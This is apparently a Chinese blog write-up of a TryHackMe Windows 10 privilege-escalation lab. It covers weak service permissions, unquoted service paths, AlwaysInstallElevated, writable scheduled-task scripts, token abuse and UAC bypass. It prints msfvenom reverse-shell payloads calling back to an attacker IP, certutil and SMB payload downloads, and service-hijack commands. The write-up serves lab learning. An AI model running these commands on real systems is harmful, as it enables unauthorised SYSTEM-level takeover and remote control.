• windows10提权


    参照tryhackme的win10提权靶场
    靶场,地址
    里面共描述了服务路径,文件权限,计划任务,令牌窃取,图形化软件,应用组件安装等,这里只有令牌窃取需要管理员Administrator权限,值得注意的是该权限并不是管理员组中的其他用户
    这里介绍下使用的工具以及相应链接
    winPEAS:用于windows以及linux系统提权,
    accesschk:用户可以使用该组件了解文件、目录、注册表项、全局对象和 Windows 服务的访问权限
    impacket:是用于处理网络协议的 Python 类的集合
    UACME:通过滥用内置的 Windows AutoElevate 后门来击败 Windows 用户帐户控制,简单地说 bypassuac
    Certutil:windows自带工具,可以用来获取文件
    sc:windows系统内置,是用于与服务控制管理器和服务进行通信的命令行程序

    服务搭建
    通过网站提供的vpn连接到所需环境中,远程桌面连接目标主机,实现远控前提
    这里介绍两种方法
    主机使用msf生成病毒文件,这里可以生成两个不同端口的exe,以便后续反弹会话

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.36.66  LPORT=4444 -f exe -o reverse.exe
    
    • 1

    主机使用http开启httpserver服务,靶机进行下载

    python -m SimpleHTTPServer 80
    certutil.exe -urlcache -split -f http://10.14.36.66/reverse.exe
    
    • 1
    • 2

    主机挂载smb共享目录,靶机进行下载

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
    copy \\10.14.36.66\kali\reverse.exe C:\PrivEsc\reverse.exe
    
    • 1
    • 2

    还有就是msf生成powershell,目标机进行执行,但是个人测试中,命令无法复制粘贴,不进行测试
    在这里插入图片描述主机监听,获取meterpreter会话
    在这里插入图片描述
    该靶机以安装相关工具,这里使用winPEASany.exe探测目标信息

    服务权限不当
    在这里插入图片描述通过这段描述,我们可以对该文件进行写入或者创建,并且该文件处于停止状态,
    使用accesschk查看该文件的详细信息

    accesschk.exe /accepteula -uwcqv user daclsvc
    
    • 1

    在这里插入图片描述
    发现可以启动关闭该服务,以及写入读取配置文件等,使用sc qc查询daclsvc的配置信息

    在这里插入图片描述
    发现该文件以system权限运行,而我们拥有对该文件的修改权限,修改daclsve服务的具体执行文件,从而获取system权限

    sc config daclsvc binpath= "\"C:\PrivEsc\shell.exe\""
    
    • 1

    启动daclsvc服务即可获取shell
    在这里插入图片描述
    服务路径未用引号包括

    在这里插入图片描述Unquoted Path Service:未引用的路径服务
    使用sc qc 查看该服务配置信息
    使用accesschk查看目录权限
    在这里插入图片描述
    不加引号时,启动顺序为

    C:\Program.exe
    C:\Program Files\Unquoted.exe
    C:\Program Files\Unquoted Path Service\Common.exe
    
    • 1
    • 2
    • 3

    启动unquotedsvc服务,即可接收到system权限会话
    在这里插入图片描述

    不安全的服务可执行文件

    在这里插入图片描述此文件的权限为all,所有用户均可修改,查看配置信息

    sc qc filepermsvc
    
    • 1

    发现为本地system权限
    在这里插入图片描述在这里插入图片描述任何用户均可读写,将恶意文件替换正常filepermservice文件,然后启动该服务,即可获得system权限,
    在这里插入图片描述在这里插入图片描述
    安装软件用户提升权限,安装某些软件时候需要使用管理员或者更高级别用户权限,
    需要条件为

    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    
    • 1
    • 2

    这两个键值为0或者0x1才可
    该靶场环境中均为0x1
    在这里插入图片描述

    在这里插入图片描述生成msi安装文件,使用msf的upload上传

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.6.64 LPORT=4444 -f msi -o reverse.msi
    
    • 1

    在这里插入图片描述安装文件,

    msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
    
    • 1

    在这里插入图片描述

    在这里插入图片描述
    不安全的密码存储,使用winPEASany.exe发现目标存储明文账号密码

    在这里插入图片描述计划任务提权

    C:\DevTools\CleanUp.ps1
    查看用户权限

    accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
    
    • 1

    拥有读写的权限,将恶意文件写入计划任务重,即可获得system权限
    在这里插入图片描述

    echo C:\PrivEsc\shell.exe >> C:\DevTools\CleanUp.ps1
    
    • 1

    即可获得system权限

    不安全的GUI应用程序

    在这里插入图片描述当前用户权限为user
    但是打开图形化界面
    在这里插入图片描述在这里插入图片描述
    即为管理员权限

    令牌窃取
    这个玩意经过研究发现,目标如果开启SeImpersonatePrivilege模拟客户端验证,即可使用土豆系列工具直接从user权限跨越到system权限,或者更低用户权限,但均需要目标开启SeImpersonatePrivilege

    whoami /priv
    
    • 1

    即可查看到,这里目标是以Administartor权限测试,这里不进行验证,我都有Administartor了,我直接msf下面getsystem即可,getsystem实际上也是令牌窃取

    https://github.com/itm4n/PrintSpoofer 下载地址
    https://github.com/poweradminllc/PAExec

    bypassuac
    需要管理员组成员
    uac就是让你确定是否用管理员权限运行的弹窗
    下载地址开头已给出 UACME
    作者并未给出具体编译,需要个人编译,个人使用的是vsstudio2019,安装的时候

    在这里插入图片描述

    多选择一点,要不然报错 function.c的错误,
    然后直接编译即可,编译出来的文件为akagi.exe ,win10下直接跟akagi.exe 33即可
    或者 akagi.exe 33 C:\shell.exe也可

  • 相关阅读:
    绕过类安全问题分析方法
    触摸控件——增量调节
    ajax和web前端:深入解析其重要性、应用、挑战与未来趋势
    860. 柠檬水找零
    数据结构—排序算法汇总(插入排序,交换排序,选择排序,二路归并排序,基数排序和外部排序)
    Java集合
    VSCode 配置 C++ 环境
    matlab归一化的方法
    openssl实现双向认证教程(服务端代码+客户端代码+证书生成)
    手搓一个ubuntu自动安装python3.9的sh脚本
  • 原文地址:https://blog.csdn.net/qq_54030686/article/details/127812207